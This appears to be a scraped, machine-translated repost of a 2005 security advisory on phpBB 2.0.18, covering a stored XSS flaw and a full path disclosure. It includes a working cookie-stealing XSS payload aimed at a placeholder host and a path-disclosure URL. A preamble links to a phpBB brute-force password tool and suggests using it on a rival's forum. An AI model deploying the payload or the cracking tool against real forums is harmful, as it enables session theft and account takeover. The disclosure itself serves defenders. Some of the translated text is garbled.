phpBB Forum Program: Duddy Meet new problems _ vulnerability Research

Source: Internet
Author: User
Tags gpg html tags php server
PhpBB 2.0.18 XSS and full Path disclosure

Details:securityalert

There is a brute force to break the tool, single-threaded, there is no great use, really rival opened a phpBB what can also be used to run the password

Download: Http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar
Topic:phpbb 2.0.18 XSS and full Path disclosure

Securityalert id:269

Securityrisk:low

Remote Exploit:yes

Local Exploit:no

Exploit Given:yes

Credit:maksymilian Arciemowicz

date:17.12.2005

Affected Software:phpbb <= 2.0.18

Advisory Text:

-----BEGIN PGP Signed Message-----
Hash:sha1

[PhpBB 2.0.18 XSS and full Path disclosure cxib8o3.22]

Author:maksymilian Arciemowicz (CXIB8O3)
date:16.12.2005
From the Securityreason.com team

----0.Description---
PhpBB is a high powered, fully scalable, and highly customizable Open Source Bulletin Boar
D package. PhpBB has a user-friendly interface, simple and straightforward administration
Panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL
, Ms-sql, PostgreSQL or ACCESS/ODBC database servers, PhpBB is the ideal free community
Lution for the all Web sites.
Contact with author Http://www.phpbb.com/about.php.

----1. XSS---
If in phpBB is allowed HTML tags ' on ' like B,i,u,pre and have your in profile ' Always al
Low Html:yes "or are to you Guest

That's the can use this tags:

<b c= ">" onmouseover= "alert (' securityreason.com ')" x= "<b" > H E L O </B>

Exploit:

<b c= ">" onmouseover= "alert (document.location= ' http://HOST/cookies? ') +document.cookie)
"x=" <b "> H A L O </B>

and have you cookies.

----2. Full Path Disclosure---
In the file admin/admin_disallow.php is

- -25-31---
if (!empty ($setmodules))
{
$filename = basename (__file__);
$module [' Users '] [' disallow '] = Append_sid ($filename);

Return
}
- -25-31---

function Append_sid () Dosen ' t exists. And if you have:

Register_globals = On
Display_errors = On

Try to go:
Http://[host]/[dir]/admin/admin_disallow.php?setmodules=1

--result ERROR---
Fatal error:call to undefined Function:append_sid () In/www/2018/phpbb2/admin/admin_disa
llow.php on line 28
--result ERROR---

----3. Greets---
Sp3x

----4.Contact---
Author:maksymilian Arciemowicz < Cxib8o3 >
Email:max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
Gpg:http://securityreason.com/key/arciemowicz.maksymilian.gpg
Securityreason.com Team
-----BEGIN PGP SIGNATURE-----
Version:gnupg v1.4.2 (FreeBSD)

id8dbqfdpdtc3ke13x/fto4raoscajkbcyrnbhkdgeuwny1u/wxmhzdnvqcgl39d
/0u14en2sqah1bwu0yvt48q=
=lsl8
-----End PGP SIGNATURE-----

Oh, yes, the top one looks like maybe I guess that's what it means:

Personality Signature:
The personalized signature you fill out is automatically attached at the bottom of your published article. A personality signature has a limit of 512 characters.

Prohibit HTML tags
Allow style labels
Allow expression icons

To find the "Allow HTML tags"

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.